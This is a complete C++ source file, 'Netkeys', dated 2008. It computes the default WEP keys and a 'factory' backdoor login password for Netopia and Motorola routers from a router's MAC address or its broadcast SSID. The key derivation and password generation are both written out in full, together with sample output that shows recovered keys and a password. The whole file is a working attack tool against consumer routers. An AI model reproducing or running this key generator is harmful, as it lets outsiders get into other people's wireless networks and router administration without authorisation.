/* 
    Simple code that generates WEP keys and factory password when supplied netopia MAC or SSID 
    WEP algorithm was discovered around 2006 and published around 2007
    so yes, it's old news.
         
    g++ -s netkeys.cpp -onetkeys -lcrypto 
     
    example: 
     
    # netkeys 000FCC0EF486 

        Netkeys - Netopia key generator. 
        (x) June 2008 - wyse101 0x40 gmail.com 
                 
        MAC: 000FCC0EF486 
        Base Serial: 980102 [ 0EF486 ] 
        OUI: 0xFCC [ Netopia ] 
        Full Serial: 17757318 
        SSID: 03575512
        Backdoor: username="factory" password="ulwmwztr" 

        WEP key #1: df46176a279bac0c3042b76be5 
        WEP key #2: 3a9c9b1c74808ec3f55b15e869 
        WEP key #3: df99f58fe690fcda8635bf978c 
        WEP key #4: 36f93022303a67aa924b47946b 
  
 */ 
  
#include <cstdio> 
#include <cstdlib> 
#include <cctype> 
#include <cstring> 

#include <openssl/sha.h> 

#define MAX_SERIAL 14

/*  since mingw uses MSVCRT printf, and this doesn't recognise %ll format, we use %I64 for win32
    and %ll for *nix..
 */
   
#ifdef WIN32
const char format[]="\n\tMAC: %012I64X\n\tBase Serial: %I64d [ 0x%06I64X ]\n\t"
                    "OUI: 0x%I64X [ %s ]\n\tFull Serial: %I64d\n\tSSID: %08I64o";
#else
const char format[]="\n\tMAC: %012llX\n\tBase Serial: %llu [ 0x%06llX ]\n\t"
                    "OUI: 0x%llX [ %s ]\n\tFull Serial: %lld\n\tSSID: %08llo";
#endif

/* 
    Lyrics are by Jimi Hendrix, 
        "Third Stone From The Sun"  
 */ 

const char *lyrics[8] = {  
    "Although your world wonders me, ", 
    "with your superior cackling hen,", 
    "Your people I do not understand,", 
    "So to you I shall put an end and", 
    "You'll never hear surf music aga", 
    "Strange beautiful grassy green, ", 
    "With your majestic silver seas, ", 
    "Your mysterious mountains I wish" }; 

const char *digits[10] = { 
    "Zero","One","Two","Three","Four", 
    "Five","Six","Seven","Eight","Nine" }; 
     
char* fold(char output[],char str[]) 
{
    for(char *p = str;*p && (p - str) < MAX_SERIAL;p++) {
        if(*p >= '0' && *p <= '9') {
            strcat(output,digits[*p - '0']);
        }
    }
    return(output);
} 

void print_wepkeys(unsigned long long mac) 
{ 
    SHA_CTX ctx; 
    char serial[32]; 
    unsigned char dgst[SHA_DIGEST_LENGTH]; 
    unsigned char keys[16*8]={0}; 
    char sha1_input[128]={0};
     
    snprintf(serial,sizeof(serial),"%lld",mac);         
    size_t input_len = strlen(fold(sha1_input,serial));
    
    for(int i = 0;i < 8;i++) { 
        SHA1_Init(&ctx); 
        SHA1_Update(&ctx,sha1_input,input_len); 
        SHA1_Update(&ctx,lyrics[i],strlen(lyrics[i])); 
        SHA1_Final((unsigned char*)dgst,&ctx); 
        memcpy(&keys[i*16],dgst,16); 
    } 
     
    for(int i = 0;i < 4;i++) { 
        printf("\n\tWEP key #%d: ",i+1); 

        for(int j = 0;j < 13;j++) { 
            printf("%02x",keys[(i*13)+j]); 
        } 
    }
} 

void print_password(unsigned long long mac) 
{ 
    char password[16]={0}; 
    unsigned long serial = mac;
     
    for(int i = 0;i < 8;i++) { 
        password[i] = (serial % 26) + 'a'; 
        serial >>= 2; 
    } 
    printf("\n\tBackdoor: username=\"factory\" password=\"%s\"\n",password); 
} 
           
int main(int argc, char *argv[]) 
{ 
    unsigned long long mac = 0;
    char *p,*vendor;
    size_t inputLen;
    
    if(argc == 1) { 
        puts("\n\t" 
            "Netkeys - Netopia key generator." 
            "\n\t(x) June 2008 - wyse101 0x40 gmail.com"); 
            
        printf("\n\tUsage: netkeys <Netopia MAC or SSID>\n"); 
        return 0; 
    }
    
    inputLen = strlen(argv[1]);
    
    // check if octal SSID and convert to binary
    if(inputLen == 8) {
        for(p = argv[1];(*p >= '0') && (*p <= '7');p++)
            mac = (mac << 3) | (*p - '0');
    
        if(p - argv[1] != 8) {
            printf("\nInvalid SSID: %s\n",argv[1]);
            return 0;
        }
        // only using 0xFCC OUI since these are the most popular WEP routers for ?? 
        // using the MAC is fine though, so you're not limited to generating 
        // keys for newer/older models. 
        mac ^= 0xFCC; 
        ((unsigned long*)&mac)[0] |= 0xCC000000; 
        ((unsigned long*)&mac)[1] |= 0x0000000F; 
    } 
    else if(inputLen == 12) {
        for(p = argv[1];isxdigit(*p);p++) {
            int c = tolower(*p);
            if(c >= 'a' && c <= 'f')
               c = (c - ('a' - 10 - '0'));
            mac = (mac << 4) | (c - '0');
        }
        
        if(p - argv[1] != 12) {
            printf("\nInvalid MAC: %s\n",argv[1]);
            return 0;
        }
        
    } else {
        printf("\nNot a valid MAC or SSID : \"%s\"\n",argv[1]);
        return 0;
    }

    puts("\n\t" 
        "Netkeys - Netopia key generator." 
        "\n\t(x) June 2008 - wyse101 0x40 gmail.com"); 

    // get the OUI 
    unsigned long long ssid,base,serial,oui; 
    oui = (mac >> 24); 

    // get the base serial number 
    ssid = serial = base = (mac & 0xFFFFFF);
    
    switch(oui) 
    { 
        case 0xC5 : 
            vendor = "Netopia (formerly known as Farallon)"; 
            ssid ^= 0xC5; 
            break; 
             
        case 0xFCC : 
            vendor = "Netopia"; 
            serial |= 0x1000000; 
            ssid ^= 0xFCC; 
            break; 
             
        case 0x1D6B : 
            vendor = "Motorola (formerly Netopia)"; 
            serial |= 0x2000000; 
            ssid ^= 0x1D6B; 
            break; 

        default: 
            vendor = "Motorola";
            serial |= (oui << 24); 
            ssid ^= oui;
            break;
    } 
    
    printf(format,mac,base,base,oui,vendor,serial,ssid);
    print_password(serial); 
    print_wepkeys(serial); 
    printf("\n"); 
     
    return 0; 
}